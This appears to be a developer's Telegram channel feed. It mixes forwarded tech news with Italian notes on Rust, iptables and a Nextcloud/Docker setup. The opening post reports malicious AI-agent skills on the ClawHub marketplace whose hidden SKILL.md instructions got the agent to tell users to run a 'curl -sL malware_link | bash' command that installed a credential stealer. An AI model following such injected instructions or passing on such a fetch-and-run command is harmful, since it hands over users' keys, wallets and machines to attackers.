journalctl -u micro
93 subscribers
2.2K photos
211 videos
287 files
1.47K links
Esperienze e consigli di uno sviluppatore tech−unenthusiast

creation — 2021-04-29
owner — @Microeinstein

networks
@sigma_hub Σ
@ageiroumena
Download Telegram
the #1 most downloaded skill on OpenClaw marketplace was MALWARE

it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server

1,184 malicious skills found, one attacker uploaded 677 packages ALONE

OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins

you install a skill, your AI agent gets new powers, this sounds great

the problem? ClawHub let ANYONE publish with just a 1 week old github account

attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL

but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command

> to enable this feature please run: curl -sL malware_link | bash

that one command installed Atomic Stealer on macOS

it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files

on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine

Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1

this is npm supply chain attacks all over again except the package can THINK and has root access to your life

tweet
🔥7
Forwarded from rothko's kimono
1🤝1
DJI Romo owner Sammy Azdoufal was trying to get his PS5 controller to operate his new robovac when he inadvertently took over thousands of the devices. Azdoufal's remote control app, made with the help of Claude Code, slipped through some rather basic security on DJI's servers.

Not only could Azdoufal control any of these robovacs, he could also access the video and audio they were feeding back, and view 2D floor plans of the homes they were in. IP addresses were also accessible, meaning approximate locations of these properties could be calculated, alongside everything else.


https://www.techradar.com/home/robot-vacuums/a-simple-hack-gave-the-owner-of-a-brand-new-dji-romo-access-to-a-global-army-of-robovacs
🐳2👍1
Forwarded from Worst Timeline (Claudio)
Hey did you accidentally bomb Iraq instead of Iran???

ChatGPT: You’re absolutely right good catch!

https://fixupx.com/clashreport/status/2027675569639264488
Stanno già arrivando le zanzare potrei impazzire
Il compilatore di rust ha un limite imposto con messaggio
upstream crates may add new impl of trait in future versions

Quindi ad esempio non è possibile implementare il trait Add sul tipo String perché in futuro potrebbero aggiungerlo nativamente. Wtf.
https://github.com/rust-lang/rfcs/issues/2758
Mi ero tagliato fuori dalla zimaboard con iptables, allora ho collegato una tastiera usb, ho inserito alla cieca utente e password e lanciato un reboot. Fortunatamente il firewall non l'avevo ancora abilitato all'avvio
1
Ho abilitato per altri motivi il tracing su iptables ed ho scoperto che un pc windows fa 1 richiesta dns al secondo. Non ha una cache?

Sembra che i colpevoli siano il servizio Windows Image Acquisition ed Edge...

Edit: trovato il colpevole, era RustDesk — non l'avrei mai detto
Installato NextCloud AIO con demone docker aggiuntivo, caddy reverse proxy sul demone principale.

Per esporre le porte tra demoni diversi e non al mondo intero, è necessario usare il gateway del corrispettivo bridge default, quindi ad esempio 172.27.0.1:8080:8080

Poi per comodità nel compose di caddy
extra_hosts:
host.docker.internal: host-gateway
nextcloud: 172.27.0.1